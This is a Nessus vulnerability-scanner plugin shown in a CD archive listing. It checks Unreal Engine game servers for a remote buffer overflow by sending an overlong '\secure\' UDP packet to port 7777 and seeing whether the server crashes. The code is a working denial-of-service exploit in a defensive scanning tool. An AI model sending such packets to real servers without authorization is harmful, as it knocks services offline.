home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / modules / nessus-2.2.8.mo / usr / lib / nessus / plugins / unreal_dos.nasl < prev    next >
Text File  |  2005-01-14  |  1KB  |  61 lines

  1. if(description)
  2. {
  3.  script_id(12285);
  4.  script_bugtraq_id(10570);
  5.  script_version ("$Revision: 1.2 $");
  6.  
  7.  name["english"] = "Unreal secure remote buffer overflow";
  8.  
  9.  script_name(english:name["english"]);
  10.  
  11.     desc["english"] = "
  12. The remote host was running a game server with the Unreal Engine on it.
  13.  
  14. The game server is vulnerable to a remote attack which allows for 
  15. arbitrary code execution.
  16.  
  17. *** Note that Nessus disabled this service by testing for this flaw
  18. Solution : Epic has released a patch for this issue 
  19.  
  20. Risk factor : High
  21. See also: http://www.securiteam.com/windowsntfocus/5BP0P0AD5W.html";
  22.  
  23.  
  24.  script_description(english:desc["english"]);
  25.  
  26.  
  27.  summary["english"] = "Crashes the remote Unreal Engine Game Server";
  28.  
  29.  script_summary(english:summary["english"]);
  30.  
  31.  script_category(ACT_DESTRUCTIVE_ATTACK);
  32.  
  33.  script_copyright(english:"This script is Copyright (C) 2004 Tenable Network Security");
  34.  
  35.  family["english"] = "Gain root remotely";
  36.  family["francais"] = "Passer root α distance";
  37.  script_family(english:family["english"], francais:family["francais"]);
  38.  exit(0);
  39. }
  40.  
  41.  
  42.  
  43. port = 7777;
  44. init = string("\\status\\");
  45. malpacket = string("\\secure\\", crap(data:"a", length:1024) );
  46.  
  47. soc = open_sock_udp(port);
  48.  
  49. send(socket:soc, data:init);
  50. r = recv(socket:soc, length:128);
  51. if (r)
  52. {
  53.     send(socket:soc, data:malpacket);
  54.     r = recv(socket:soc, length:128);
  55.     if (! r)
  56.     {
  57.         security_hole(port);
  58.         exit(0);
  59.     }
  60. }    
  61.